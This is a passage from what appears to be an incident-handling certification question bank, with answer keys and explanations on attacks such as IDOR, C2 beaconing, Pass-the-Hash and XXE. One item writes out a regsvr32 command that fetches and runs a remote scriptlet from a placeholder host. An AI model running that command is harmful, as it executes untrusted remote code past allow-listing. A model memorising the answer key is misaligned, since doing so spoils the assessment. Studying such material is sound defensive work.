The correct answer is a successful brute-force attack. The pattern of many failed logon attempts (Event ID 4625) followed by a successful logon (Event ID 4624) from the same source IP in a short period is indicative of a brute-force attack. The attacker systematically tried passwords until one worked.

This is a common initial access technique, and incident handlers should investigate the source IP and check for further compromise.

Exam trap

The trap here is assuming it's a password-spraying attack, but spraying targets multiple accounts with few attempts each, while this scenario shows many failures for likely one account.

181
MCQhard

An incident responder is examining a GraphQL API after a breach report. Query logs show a single POST to /graphql containing a query that requests a user's profile, that user's friends, each friend's friends, and so on through deeply chained relationship fields, all in one request. The response was several megabytes and the database showed a spike in joins. No authentication bypass occurred. Which attack does this describe?

A.A batched query attack using aliases to replay the same mutation many times
B.A server-side request forgery via a GraphQL resolver that fetches remote URLs
C.A resource-exhaustion query exploiting unbounded nesting of relationship fields
D.GraphQL introspection abuse to map the schema
AnswerC

The query chains relationship fields arbitrarily deep, so the server resolves a combinatorial explosion of related records in one request, producing a multi-megabyte response and heavy database joins. This is the GraphQL-specific resource exhaustion pattern that arises when depth, complexity, and pagination limits are absent. Authentication was valid, so the abuse is in query structure rather than identity, matching the observed database spike.

Why this answer

The request abused GraphQL's ability to traverse arbitrarily deep relationships in a single query, forcing the server to resolve a huge graph of related records and return a multi-megabyte response. Because the caller was authenticated, the weakness is missing query cost controls rather than an authentication flaw. Defenders should enforce depth limits, complexity scoring, pagination caps, and timeouts on the GraphQL layer.

Exam trap

The trap here is attributing any suspicious GraphQL request to introspection or alias batching, when the observed evidence is nested relationship traversal causing resource exhaustion.

182
MCQmedium

An adversary uses PowerShell to establish a reverse shell. The command includes the '-EncodedCommand' flag with a long Base64 string. What is the most effective way to detect this activity without relying on static command signatures?

A.Block all outbound connections originating from PowerShell processes.
B.Enable PowerShell Script Block Logging to capture de-obfuscated code.
C.Monitor for any usage of the 'powershell.exe' process in logs.
D.Perform string analysis on all files in the system directories.
AnswerB

Script Block Logging captures the final, de-obfuscated script content that is actually executed by the PowerShell engine. This bypasses the Base64 encoding completely, giving analysts visibility into the raw commands. This is the industry-standard method for detecting and investigating malicious PowerShell usage in enterprise environments today.

Why this answer

Static signatures fail against randomized Base64 encoding. Behavioral detection, specifically script block logging, captures the de-obfuscated code before execution. This is essential for incident handlers because attackers frequently use obfuscation to bypass simple keyword filters.

Script block logging provides the exact command executed in memory, allowing for accurate analysis of the intent regardless of the obfuscation technique employed by the attacker.

Exam trap

Candidates often search for static Base64 strings, which is ineffective because attackers can easily randomize encoding, rendering static signatures useless against modern obfuscated PowerShell payloads.

183
MCQmedium

A GCIH responder is investigating a compromised AWS account where an EC2 instance's IAM role credentials were stolen from the instance metadata service. The attacker used those temporary credentials from an external IP address to download sensitive objects from an S3 bucket. Which AWS service or mechanism would have provided the earliest detection of this specific anomalous behavior?

A.Amazon GuardDuty with findings for unauthorized access to IAM credentials
B.AWS CloudTrail data events for S3 object-level operations
C.Amazon Macie sensitive data discovery jobs on the S3 bucket
D.AWS Trusted Advisor security checks for S3 bucket permissions
AnswerA

GuardDuty continuously monitors CloudTrail management events, VPC Flow Logs, and DNS logs to detect anomalous behavior. It has specific finding types such as UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration that trigger when EC2 instance role credentials are used from an external IP address. This provides the earliest automated detection of this exact scenario because it correlates credential usage with network origin.

Why this answer

GuardDuty analyzes CloudTrail management events to identify when EC2 instance role credentials are used from an external IP address. This specific finding type, UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration, triggers because GuardDuty correlates the credential usage with the originating IP and flags it as anomalous. CloudTrail data events alone only log the API calls without assessing whether the source is expected, while Trusted Advisor and Macie focus on configuration and data classification respectively.

Exam trap

The trap here is assuming that CloudTrail data events alone will alert on stolen credentials, when in fact they only log API calls and require manual analysis to detect the anomaly.

184
MCQmedium

A security engineer is reviewing a web application that uses a parameter `account` to retrieve account details. The parameter value is a base64-encoded string of the account number, such as `YWNjb3VudD0xMjM0`. An attacker decodes the string, changes the account number, re-encodes it, and successfully accesses another user's account. Which of the following is the most likely reason this attack succeeded?

A.The application uses weak encryption that can be broken.
B.The application fails to validate the input length, allowing buffer overflow.
C.The application relies on obfuscation instead of proper access control.
D.The application uses a predictable session token that can be guessed.
AnswerC

Base64 encoding is not encryption; it is easily reversible. The application likely assumes that encoding the account number obscures it, but without server-side authorization checks, an attacker can decode, modify, and re-encode the value. The success indicates that the application does not verify that the authenticated user owns the requested account, relying solely on the obscurity of the parameter.

Why this answer

The application uses base64 encoding to obfuscate the account number but fails to enforce access control. An attacker can easily decode the parameter, change the account number, and re-encode it. The success of the attack shows that the application relies on the obscurity of the parameter rather than verifying that the authenticated user owns the account.

This is a form of IDOR where the direct object reference is encoded.

Exam trap

The trap here is assuming that encoding or encrypting an identifier provides security, when in fact authorization checks are still required to prevent IDOR.

185
MCQeasy

A security analyst notices that a user's workstation is communicating with an external IP address on port 443, but the traffic is not TLS. Instead, the packets contain a custom protocol with a fixed header. The connection is persistent and occurs every night at 2 AM. Which type of covert communication is this most likely?

A.A misconfigured application using the wrong port
B.A legitimate software update service
C.A denial-of-service attack
D.A covert channel using a non-standard protocol over a common port
AnswerD

The traffic uses port 443, which is typically associated with HTTPS, but the payload is not TLS. Instead, it uses a custom protocol. This is a classic covert channel technique: hiding malicious communication on a commonly allowed port to bypass firewalls and evade detection. The persistent, scheduled nature also suggests a beaconing implant.

Why this answer

The correct answer is a covert channel using a non-standard protocol over a common port. Attackers often use ports like 443 to blend in with normal traffic, but they may implement their own protocol instead of TLS to avoid detection or because it's simpler. The persistent, scheduled connection suggests a beaconing implant that checks in with a C2 server.

This technique can evade firewalls that allow outbound 443 traffic.

Exam trap

The trap here is assuming that traffic on port 443 is always TLS; attackers frequently use common ports with custom protocols to bypass security controls.

186
MCQhard

Which THREE actions are recommended to secure APIs against Server-Side Request Forgery (SSRF)?

A.Implement a strict allow-list for URLs
B.Disable unused URI schemes like file:// or gopher://
C.Network-level segmentation of the API server
D.Use a public proxy for all outgoing requests
E.Store all API secrets in the URL parameters
AnswerA, B, C

Allow-lists ensure the API server only makes requests to trusted, predefined domains. By rejecting requests to unexpected or internal endpoints, the risk of the server being used as a proxy to attack internal infrastructure is significantly reduced, effectively mitigating the primary target of most SSRF exploits.

Why this answer

SSRF occurs when an API is tricked into making requests to internal or unauthorized external resources. To prevent this, developers must use strict allow-lists for destination domains, disable unused URL schemes (like file://), and enforce network-level segmentation that restricts the API server's ability to reach internal management interfaces or metadata services. These layers of defense ensure that even if an input parameter is compromised, the server remains isolated from critical internal assets.

Exam trap

Candidates often select client-side validation techniques or general firewall rules, forgetting that SSRF requires server-side restrictions like URL allow-lists and network segmentation.

187
Multi-Selecthard

A security analyst is reviewing a web application that uses a parameter `doc_id` to retrieve documents from a database. The application does not validate that the requested document belongs to the authenticated user. During an incident response, the analyst observes multiple requests with sequential `doc_id` values from a single IP address. Which TWO of the following actions should the analyst take to confirm and mitigate the IDOR vulnerability? (Choose two.)

Select 2 answers
A.Replay the requests with a different user session to verify if unauthorized access is possible.
B.Rate-limit requests from the suspicious IP address to stop the enumeration.
C.Obfuscate the `doc_id` parameter by base64-encoding it to prevent enumeration.
D.Implement a server-side check that compares the authenticated user's ID with the owner ID of the requested document.
E.Enable detailed error messages to help developers debug the issue.
AnswersA, D

Replaying the requests with another user's session tests whether the application enforces object-level authorization. If the second user can access documents belonging to the first user, it confirms IDOR. This is a standard validation step because it isolates the authorization check from other factors like session validity.

Why this answer

To confirm IDOR, the analyst should test with a different user session to see if unauthorized access occurs. To mitigate, the application must enforce server-side authorization checks that verify the authenticated user owns the requested document. These two actions address both validation and remediation.

Obfuscation, error messages, and rate-limiting do not fix the root cause.

Exam trap

The trap here is confusing obfuscation with security; encoding an identifier does not prevent IDOR if authorization checks are missing.

188
MCQeasy

An incident handler is reviewing SMB traffic logs from a small business network and notices that a client successfully authenticated to the IPC$ share on a file server using a null session. The handler wants to explain to management why this is a security concern. Which of the following best describes the risk of a successful null session to IPC$?

A.It causes the server to disable SMB signing for all subsequent authenticated sessions.
B.It enables the client to execute arbitrary code on the server with SYSTEM privileges.
C.It permits unauthenticated enumeration of users, groups, shares, and other system information.
D.It allows the client to read and write files in all shared folders on the server.
AnswerC

A null session to IPC$ allows an unauthenticated client to query certain system information through named pipes and RPC, such as user and group lists, share names, and domain details. This reconnaissance helps an attacker map the environment and plan further attacks. It does not grant file access, but the information disclosure is significant because it lowers the effort needed for lateral movement and privilege escalation.

Why this answer

A null session to IPC$ is an unauthenticated connection that allows limited queries through named pipes and RPC. Attackers use it to enumerate users, groups, shares, and domain information without credentials. This reconnaissance does not grant file access or code execution, but it exposes details that make later attacks easier.

Restricting anonymous access and disabling null sessions reduces this information disclosure.

Exam trap

The trap here is equating null session access to IPC$ with full file share access or code execution, when the actual risk is unauthenticated information enumeration.

189
MCQeasy

What is the primary benefit of using a 'Chain-of-Thought' prompting strategy when asking an LLM to analyze complex security logs?

A.It drastically increases the speed of the model's response.
B.It forces the model to explain its reasoning process step-by-step.
C.It ensures the model only uses internal, pre-trained knowledge.
D.It automatically encrypts the analysis results for secure storage.
AnswerB

By requiring the model to show its work, chain-of-thought prompting reduces the likelihood of logical errors. This is invaluable in complex security tasks, as it allows the analyst to verify each step of the reasoning chain to ensure the final conclusion is supported by the provided evidence in the logs.

Why this answer

Chain-of-thought prompting forces the model to articulate its reasoning step-by-step before reaching a final conclusion. This strategy significantly improves the model's performance on logical and diagnostic tasks by breaking down complex problems into manageable chunks. In security log analysis, this allows the analyst to follow the model's deductive process, making it easier to identify where the model might have made a logical error or an incorrect assumption.

Exam trap

Students often assume Chain-of-Thought prompting magically eliminates all hallucinations or speeds up processing time, ignoring its primary purpose of logic verification.

190
Multi-Selectmedium

A GCIH candidate is reviewing a REST API that accepts XML in an upload endpoint used for importing supplier catalogs. During a purple-team exercise, testers want to demonstrate how XML-specific parser weaknesses could be abused against this endpoint. Which two techniques should the testers attempt to validate the parser's defenses? (Choose two.)

Select 2 answers
A.Upload an oversized multipart file to exhaust disk space on the API host
B.Inject a SQL UNION statement into the catalog name field to test database query construction
C.Submit an XML document with an entity definition that recursively references itself to test for exponential entity expansion
D.Send a JSON body with a million nested arrays to the same endpoint to test depth limits
E.Submit an XML document containing an external entity declaration that references a local file path to test for XML External Entity processing
AnswersC, E

Recursive entity definitions cause parsers to expand references exponentially, the classic billion-laughs pattern that consumes memory and CPU. Testing this against the catalog import shows whether the parser enforces entity expansion limits or disables internal entity resolution. It is XML-specific and directly relevant to an upload endpoint that must safely handle documents from external suppliers.

Why this answer

Both selected techniques exercise the XML parser itself rather than the surrounding application logic. External entity declarations reveal whether the parser resolves references to local files or network resources, while recursive entity definitions reveal whether expansion is bounded. Together they validate the two most impactful XML-specific defenses for an endpoint that must accept documents from untrusted suppliers.

Exam trap

The trap here is choosing generic input-validation tests like SQL injection or oversized uploads instead of techniques that specifically exercise XML entity handling.

191
MCQmedium

An analyst detects an outbound connection using a non-standard port that exhibits high-frequency 'jitter'. Which technique best characterizes the nature of this communication?

A.Data exfiltration using high-speed burst transfers.
B.Command and control beaconing with evasion techniques.
C.Standard web browsing activity during lunch hours.
D.Network congestion caused by heavy application traffic.
AnswerB

Jitter is a common C2 evasion technique used to defeat detection systems that look for perfectly periodic connections. By adding randomness to the delay between beacons, the adversary masks the automated nature of the communication. This indicates a high level of sophistication and necessitates heuristic-based detection methodologies.

Why this answer

Jitter is the deliberate randomization of time intervals between network beacons to evade detection by algorithms looking for fixed-cadence heartbeats. By introducing this variability, attackers make their C2 traffic appear more 'human' or natural. Recognizing this technique is vital for incident handlers because it highlights the sophistication of the C2 infrastructure, requiring advanced statistical analysis beyond simple threshold-based alerts to identify the underlying automated pattern.

Exam trap

Candidates often misidentify jitter as network congestion or packet loss, failing to realize it is a deliberate, calculated technique used by C2 frameworks to mask automated communication patterns.

192
MCQhard

During an incident response engagement, an analyst reviews network flow records and notices a compromised Linux server making outbound connections to an external host. Each connection lasts exactly 45 seconds, transfers roughly 2 KB, and then terminates; a new connection begins 15 seconds later. The destination IP changes every few hours among a pool of addresses in the same /24. The payload is fully encrypted and no standard application protocol headers are visible. Which technique is the attacker MOST likely using to maintain command-and-control while evading detection?

A.Fast-flux DNS with round-robin A records
B.Peer-to-peer botnet communication using a distributed hash table
C.Beaconing over a covert channel with rotating infrastructure
D.Domain fronting through a content delivery network
AnswerC

The fixed 45-second connection duration, consistent 2 KB payload, 15-second gap, and periodic rotation of destination IPs within a /24 are classic indicators of automated beaconing used by command-and-control implants. Encrypted payloads with no standard protocol headers suggest a custom covert channel. Rotating infrastructure helps evade IP-based blocklists while the steady cadence maintains check-in with the operator.

Why this answer

The rigid timing, consistent small payload, and rotating destination IPs within a narrow range strongly indicate an automated beacon from a covert channel implant. Such implants often use custom encryption and non-standard protocols to blend in, while periodically changing C2 addresses to defeat static blocklists. Recognizing beaconing cadence and infrastructure rotation is essential for identifying stealthy command-and-control during incident response.

Exam trap

The trap here is assuming any encrypted outbound traffic must be domain fronting or fast-flux, when the deterministic beaconing cadence and small fixed payloads are the real signature of a covert channel.

193
MCQmedium

During an investigation of a compromised Windows 10 workstation, you observe the following command executed by a user process: `regsvr32.exe /s /u /i:https://malicious.example/payload.sct scrobj.dll`. The user has no legitimate reason to run regsvr32. Which attack technique is this command most indicative of?

A.COM hijacking via registry modification
B.DLL hijacking through a malicious scrobj.dll
C.AppLocker bypass via msbuild.exe
D.Squiblydoo
AnswerD

This command uses regsvr32.exe to load a remote scriptlet (.sct) via the /i: URL parameter, bypassing application whitelisting and executing arbitrary code. This is the classic Squiblydoo technique, which abuses the trusted regsvr32 binary to download and execute a scriptlet, often for initial access or lateral movement.

Why this answer

The command uses regsvr32.exe with the /i: parameter to load a remote scriptlet from a URL, a technique known as Squiblydoo. This bypasses application whitelisting because regsvr32 is a trusted, signed binary. The attacker leverages this to execute code without writing a persistent executable to disk, making detection challenging.

Exam trap

The trap here is assuming any regsvr32 usage is benign COM registration, when the /i: URL and .sct extension clearly indicate remote scriptlet execution.

194
MCQmedium

Why does the use of pepper provide additional security for password hashes, and where should it ideally be stored?

A.Stored in the same database table; prevents rainbow tables
B.Stored in a separate environment variable; adds an extra layer
C.Stored in the application code; ensures performance
D.Stored in the user session; ensures unique hashes
AnswerB

Storing the pepper in a secure, separate location (like an environment variable or HSM) ensures that a database leak alone does not expose the passwords. The attacker would need both the database and access to the server's configuration/environment to have any hope of cracking the hashes.

Why this answer

A pepper is a secret value added to the password hashing process that is stored separately from the hash, typically in a secure configuration file, environment variable, or Hardware Security Module (HSM). Because the pepper is not stored in the database, an attacker who steals only the database cannot brute-force the hashes, as they lack the pepper. This creates a dual-layer dependency that significantly raises the bar for successful offline cracking attempts.

Exam trap

Many candidates confuse a pepper with a salt, incorrectly believing that a pepper should be stored alongside the password hash in the public database table rather than separately.

195
MCQmedium

An incident responder notices a spike in outbound traffic on port 443 originating from a server that normally only communicates with a local database. Which tool is most effective for identifying the specific process responsible for this anomalous network activity?

A.tcpdump -i eth0
B.netstat -ano
C.nmap -sV target
D.ifconfig -a
AnswerB

The -ano flags in netstat display all active connections, include numeric addresses, and show the process ID owning each connection. This direct mapping allows the responder to identify the exact binary or service responsible for the outbound port 443 traffic, facilitating immediate containment actions against the process.

Why this answer

Identifying the link between network sockets and the system process is critical during incident handling. Netstat or ss utilities, specifically when used with process identification flags, allow responders to map external traffic to local binaries. This visibility is essential for distinguishing between legitimate service communication and unauthorized exfiltration or command-and-control beacons, enabling the responder to terminate malicious processes and isolate affected infrastructure quickly.

Exam trap

Candidates often select packet capture tools or general bandwidth monitors, forgetting that mapping specific ports directly to local process IDs requires endpoint socket utilities.

196
MCQhard

When investigating an AI-generated spear-phishing campaign, what is the most effective indicator to look for that suggests the content was created by a Large Language Model (LLM)?

A.Presence of multiple spelling and grammatical errors.
B.Consistent, overly formal tone that lacks specific organizational context.
C.Inclusion of malicious code within the email header metadata.
D.The email is sent from a known, compromised account.
AnswerB

AI models tend to default to a polite, formal, and generic tone when instructed to write persuasive emails. They often lack the 'tribal knowledge' or specific cultural context of the target organization. This generic nature is a strong indicator of AI generation, as human-written phishing often contains specific internal references or unique colloquialisms.

Why this answer

LLMs often produce text that is grammatically perfect but lacks the specific, idiosyncratic context or 'human touch' of targeted communication. Identifying these characteristics requires comparing the suspect emails against known communication baselines of the purported sender. Understanding these patterns is crucial because AI can now produce highly convincing phishing lures at scale, requiring responders to look past the superficial professionalism to find the lack of contextual depth or intent alignment.

Exam trap

Candidates often look for 'spelling errors' or 'bad grammar,' forgetting that modern LLMs are highly proficient at generating grammatically perfect text that lacks specific, localized organizational context.

197
MCQhard

A GCIH analyst is called after a SaaS provider reports that an integration partner's API traffic began returning other tenants' records. The partner's client was calling /api/v3/documents/{documentId} and had recently started sending a second header, X-Tenant-Id, that the gateway trusts to route requests. The analyst confirms the partner is authenticated with a valid OAuth 2.0 bearer token scoped to its own tenant. Which weakness allowed the cross-tenant exposure?

A.The document IDs were sequential integers, allowing enumeration of other tenants' records by incrementing the identifier
B.The OAuth 2.0 bearer token was forged because the partner guessed the signing key used by the authorization server
C.The integration partner exploited a race condition in the API's caching layer to retrieve stale responses belonging to other tenants
D.The API trusted a client-supplied header for tenant routing instead of deriving tenant scope from the authenticated token claims
AnswerD

Because the gateway routes on the attacker-controllable X-Tenant-Id header while authorization relies only on the bearer token, an authenticated partner can name any tenant and receive its documents. The tenant boundary should be derived from a verified token claim or server-side session, never from a header the caller can set. This is a broken authorization design flaw rather than a token forgery or injection issue.

Why this answer

The gateway trusted an attacker-controllable header to decide which tenant's data to return while authorization relied solely on the caller's own bearer token. Because tenant selection and authorization were decoupled, any authenticated caller could request another tenant's documents by naming that tenant in the header. The fix is to derive tenant scope from verified token claims or server-side state and ignore client-supplied routing headers for authorization decisions.

Exam trap

The trap here is focusing on token validity or ID enumeration while missing that a client-controlled routing header silently overrode the tenant boundary.

198
MCQeasy

Which of the following is a primary benefit of using a centralized log management (CLM) solution during an incident?

A.It automatically blocks all malicious traffic.
B.It provides a unified view for log correlation.
C.It encrypts all data on the network.
D.It prevents unauthorized local access.
AnswerB

The main benefit of a CLM solution is its ability to aggregate logs from multiple devices into one searchable interface. This enables analysts to correlate activities, such as matching a network login on a server with an unusual process start on an endpoint, which is essential for investigation.

Why this answer

Centralized log management aggregates logs from disparate sources, providing a single point of visibility. This is crucial for correlation, as it allows analysts to link events across different systems—such as matching a firewall block with a specific endpoint execution. Without CLM, responders must manually query every host, which is slow, error-prone, and often impossible if an attacker deletes local logs to cover their tracks.

Exam trap

Candidates often select answers focused purely on local storage capacity or simple backup solutions, forgetting that incident correlation requires unified multi-source visibility.

199
MCQhard

An incident handler is analyzing a PCAP and observes a series of TCP packets with the SYN flag set, followed by a single RST/ACK packet from the destination. What is the most likely explanation for this pattern?

A.A TCP SYN flood attack is in progress.
B.The source is performing a TCP SYN scan against the destination.
C.The destination host is performing a port scan on the source.
D.A firewall is resetting connections from the source.
AnswerB

In a TCP SYN scan (half-open scan), the scanner sends a SYN packet to a target port. If the port is closed, the target responds with RST/ACK. This pattern is characteristic of tools like Nmap when performing a SYN scan. The scanner does not complete the handshake, making it stealthier. The presence of multiple SYN packets followed by RST/ACK responses indicates that the source is probing multiple ports on the destination.

Why this answer

The sequence of SYN packets followed by RST/ACK responses is indicative of a TCP SYN scan. The scanner sends SYN packets to various ports; if a port is closed, the target replies with RST/ACK. This is a common reconnaissance technique used to discover open ports without completing the TCP handshake.

A SYN flood would not elicit RST/ACK responses, and a firewall reset would typically involve different packet flows. The direction of packets confirms that the source is scanning the destination.

Exam trap

The trap here is confusing a SYN scan with a SYN flood; a SYN flood involves many SYNs without completing handshakes and typically no RST/ACK responses, while a SYN scan receives RST/ACK for closed ports.

200
MCQhard

An incident responder is reviewing logs from a Windows environment and finds that an attacker obtained the NT hash of a domain administrator through a credential dumping technique. The attacker then used that hash to authenticate to multiple servers without ever knowing the cleartext password. Which condition allowed this Pass-the-Hash authentication to succeed?

A.The target servers accepted NTLM authentication and the attacker supplied the NT hash directly as the response to the server challenge.
B.Kerberos was enforced across the domain, allowing the attacker to request a service ticket using the NT hash as the long-term key.
C.The attacker had previously obtained the cleartext password and used it to derive the NT hash on each target server.
D.The servers were configured to cache credentials in LSASS, which allowed the attacker to reuse the cached hash for authentication.
AnswerA

Pass-the-Hash works because NTLM authentication only requires the NT hash to compute the challenge/response, not the cleartext password. When a server accepts NTLM, an attacker who possesses the NT hash can supply it to generate a valid response. This is why obtaining the hash is often equivalent to obtaining the password for authentication purposes in NTLM-enabled environments.

Why this answer

Pass-the-Hash succeeds because NTLM authentication relies on the NT hash to compute the challenge/response and never requires the cleartext password. Once an attacker extracts the NT hash, they can authenticate to any NTLM-accepting service as that user. Defenses include disabling NTLM, enforcing Kerberos, implementing credential Guard, and restricting privileged account logons to specific hardened hosts.

Exam trap

The trap here is confusing Pass-the-Hash with Overpass-the-Hash, which uses the hash to obtain Kerberos tickets; Pass-the-Hash specifically leverages NTLM authentication.

201
MCQhard

An incident responder is analyzing a potential compromise in an AWS environment. The responder notices that an IAM role attached to an EC2 instance has been used to access an S3 bucket from an external IP address. The role's trust policy allows the EC2 service to assume it. Which technique is the attacker MOST likely using to abuse this role?

A.Use of long-term IAM user credentials embedded in the EC2 instance.
B.Cross-account role assumption via sts:AssumeRole.
C.Credential exfiltration from the EC2 instance metadata service (IMDS).
D.Exploitation of a confused deputy vulnerability in the S3 bucket policy.
AnswerC

The EC2 instance metadata service (IMDS) provides temporary credentials to the instance, which are associated with the IAM role. If an attacker gains access to the instance, they can query IMDS to retrieve these credentials and use them from an external IP address. This is a common attack vector, especially if IMDSv1 is enabled, which does not require a session token. The external IP usage indicates the credentials were stolen and used remotely.

Why this answer

The attacker most likely exfiltrated temporary credentials from the EC2 instance metadata service (IMDS) and used them from an external IP. Since the role's trust policy only allows EC2, the credentials must have been obtained from the instance itself. Cross-account assumption is blocked, confused deputy involves service manipulation, and long-term credentials are not used with roles.

Exam trap

The trap here is assuming that an external IP using role credentials implies cross-account access, when in fact it often indicates stolen temporary credentials from the instance metadata service.

202
MCQhard

An organization discovers that an attacker executed operating system commands via a vulnerable web application endpoint. The application takes user input, constructs an XML payload, and passes it to an underlying XML parser without disabling external entity resolution. Which type of vulnerability enabled this command execution?

A.Server-Side Template Injection via malicious expressions evaluated by template engines
B.XML External Entity injection exploiting insecure XML parser configurations
C.Cross-Site Scripting via injected script tags within CDATA sections
D.LDAP injection through improper attribute filtering in directory search queries
AnswerB

Failing to disable Document Type Definitions and external entity resolution in XML parsers allows attackers to read local files or trigger out-of-band requests. When combined with specific PHP wrappers, XXE can escalate into direct operating system command execution.

Why this answer

XML External Entity (XXE) injection arises when applications parse untrusted XML input with external entity processing enabled. Attackers can define malicious entities referencing local system files, internal network resources, or command execution wrappers, leading to severe data compromise or remote code execution scenarios.

Exam trap

Candidates often mistake this for 'Command Injection' because command execution occurs. However, the specific vector described is the parsing of XML entities, which defines it as XXE.

203
MCQmedium

An incident handler is performing an authorized network discovery scan on a perimeter segment. To bypass simple static stateful inspection firewalls that drop unexpected TCP SYN packets, the analyst decides to utilize an ACK scan (-sA in Nmap). What is the primary limitation of utilizing this specific scan type during network mapping?

A.It requires root privileges on the scanning host to construct raw TCP frames with custom header flags.
B.It causes immediate system instability and kernel panics on legacy Microsoft Windows operating systems due to malformed TCP stacks.
C.It cannot distinguish between open and closed ports because both respond with a TCP RST packet.
D.It triggers immediate critical high-severity alerts on all intrusion detection systems due to the distinct lack of a three-way handshake initiation.
AnswerC

Because standard TCP rules dictate that any unexpected ACK packet must be answered with a RST, both open and closed ports return identical reset responses. Consequently, the scanner labels both states as unfiltered, leaving the analyst unable to identify actual listening services.

Why this answer

An ACK scan sends packets with only the ACK flag set, which bypasses stateless or simple stateful firewalls that only track initial connection attempts. However, because an ACK packet is sent to an established connection, any port that is open or closed will reply with a RST packet. This behavior prevents the analyst from distinguishing between open and closed ports, making it useful solely for determining if a port is filtered by a firewall.

Exam trap

Candidates frequently confuse the purpose of Nmap ACK scans (-sA), assuming they locate open listening services, whereas they actually only determine firewall filtering states by analyzing RST responses.

204
MCQhard

During a cloud incident response engagement, an analyst reviews AWS CloudTrail logs and finds that an access key belonging to an IAM user was used from an unfamiliar IP address to call GetSecretValue against AWS Secrets Manager. The key is still active. Which immediate containment action best limits further credential misuse while preserving the ability to investigate who used the key?

A.Enable AWS GuardDuty and wait for its findings to confirm the anomaly before taking any action on the credential.
B.Delete the IAM user entirely with DeleteUser and recreate it later with the same permissions and a new access key.
C.Attach an inline IAM policy to the user that denies all actions with a Condition testing aws:SourceIp against the unfamiliar address.
D.Deactivate the access key with UpdateAccessKey, then rotate the key and review CloudTrail history associated with that key ID.
AnswerD

Deactivating the access key immediately stops any further API calls using that credential, which is the fastest containment step for a leaked long-term key. Because CloudTrail records the access key ID on every event, the history for that key remains queryable after deactivation, so the analyst can still reconstruct what the attacker did. Rotating afterward restores legitimate access safely.

Why this answer

The exposed long-term access key is the active threat, so the priority is to make it unusable right away. Deactivating the key with UpdateAccessKey halts all API calls tied to that credential while leaving the IAM user and its policies intact for analysis. CloudTrail retains the access key ID in every event record, so the investigation can continue after containment.

Rotating the credential afterward restores access without reintroducing the compromised secret.

Exam trap

The trap here is assuming that restricting the key by source IP or waiting for a detection service to flag the behavior constitutes containment, when the exposed credential itself must be deactivated to stop misuse.

205
MCQmedium

Which Nmap flag is essential when you need to perform OS fingerprinting to determine the target operating system version during an incident response assessment?

A.-sV
B.-A
C.-O
D.-sS
AnswerC

This flag specifically triggers the OS detection engine within Nmap. It probes the target with various TCP and ICMP packets and compares the responses to a database of known fingerprints. It is the focused command for identifying the target's operating system without the overhead of additional service or script scans.

Why this answer

The -O flag instructs Nmap to perform TCP/IP stack fingerprinting, which analyzes specific behaviors of the target's networking stack. This is vital for responders to classify assets, identify potential legacy systems, and determine if the target matches known vulnerable OS versions during the scoping phase of an incident investigation or routine security audit.

Exam trap

Candidates often confuse port scanning flags like -sS with operating system detection flags, incorrectly thinking standard SYN scans reveal OS versions.

206
Multi-Selectmedium

An incident handler is analyzing a compromised Windows workstation and discovers that the attacker extracted password hashes from the SAM database. The handler wants to determine which types of attacks the attacker could perform using these hashes. (Choose two.)

Select 2 answers
A.Directly decrypt the NTLM hashes using the Windows Data Protection API (DPAPI) to obtain cleartext passwords.
B.Use the hashes to generate Kerberos golden tickets without any further privileges or domain compromise.
C.Pass-the-hash to authenticate to other Windows systems using the NTLM hash without knowing the plaintext password.
D.Recover the original plaintext passwords by reversing the MD5 algorithm used to store them in the SAM database.
E.Offline brute-force or dictionary attacks against the NTLM hashes to recover plaintext passwords.
AnswersC, E

This is correct. Windows NTLM authentication accepts the hash as proof of identity in certain protocols, allowing an attacker to authenticate without cracking the hash. This technique, known as pass-the-hash, is a common lateral movement method. The attacker can use tools like Mimikatz or Impacket to inject the hash into a new session and access remote resources. It does not require the plaintext password, making it a direct threat once hashes are obtained.

Why this answer

The two correct attacks are pass-the-hash and offline cracking. Pass-the-hash exploits NTLM's design to authenticate using the hash directly, enabling lateral movement without cracking. Offline cracking attempts to recover plaintext passwords for broader reuse.

DPAPI does not decrypt hashes, golden tickets require domain-level secrets, and reversing a hash algorithm is not feasible.

Exam trap

The trap here is conflating local SAM hashes with domain-level secrets, leading to overestimating the attacker's ability to forge Kerberos tickets or decrypt hashes.

207
MCQmedium

An organization is responding to an Advanced Persistent Threat (APT). During the 'Eradication' phase, why is it critical to go beyond just removing identified malware?

A.Because malware is often just a dropper for a secondary, more complex backdoor.
B.Because antivirus signatures are always outdated and will miss the actual threat.
C.Because the attacker will likely sue the organization if any artifacts remain.
D.Because the cleanup process must generate new forensic evidence for police.
AnswerA

APT actors use multiple persistence points to guarantee they can regain access if their primary tool is discovered. A thorough eradication process involves identifying and removing all these secondary backdoors and persistence mechanisms; otherwise, the attacker will simply leverage their secondary access to re-infect the system.

Why this answer

APT actors are methodical and typically establish multiple persistence mechanisms and backdoors to ensure continued access. If a responder only removes the single piece of malware they found, the attacker can easily pivot back into the network. Eradication must involve comprehensive cleaning, including resetting compromised credentials, closing open vulnerabilities, and auditing the environment to ensure no hidden persistence points remain.

Exam trap

Candidates often believe that deleting the primary malware is sufficient for remediation, ignoring that APTs prioritize persistence and will likely have multiple hidden backdoors ready for re-entry.

208
MCQhard

During an incident involving a single-page application, a handler inspects a GraphQL endpoint at /graphql used for a customer portal. The handler captures a query that requests only the fields needed for a profile view, but the server response includes additional fields such as internalAccountTier, billingNotes, and ssnLastFour. The application uses a single shared GraphQL schema and no field-level authorization middleware. Which GraphQL-specific weakness is most directly demonstrated?

A.GraphQL aliasing used to perform a denial-of-service attack
B.Excessive data exposure from over-fetching sensitive fields in the GraphQL response
C.GraphQL query batching used to bypass rate limits
D.GraphQL introspection enabled on the production endpoint
AnswerB

The endpoint returns sensitive fields that the client query did not request, and no field-level authorization prevents them from being serialized. In GraphQL, the server executes resolvers for fields selected by the query, but if a resolver or schema design includes sensitive properties in the returned object, the response can expose them. The handler should treat this as excessive data exposure and review resolver authorization and field visibility.

Why this answer

The response includes sensitive fields that the client did not request, and the server lacks field-level authorization to prevent their serialization. GraphQL resolvers return object properties according to schema and resolver logic, so sensitive data can leak even when the query appears minimal. The handler should focus on excessive data exposure and recommend field-level authorization, schema review, and response filtering.

Exam trap

The trap here is assuming that because the client requested only a few fields, the server cannot return more; in GraphQL, resolver output and schema design determine what is serialized, so over-fetching can expose sensitive data.

209
Multi-Selectmedium

Which TWO of the following techniques are most effective for preventing Cross-Site Scripting (XSS) in a web application?

Select 2 answers
A.Using contextual output encoding.
B.Implementing a strict Content Security Policy (CSP).
C.Enforcing HTTPS for all application traffic.
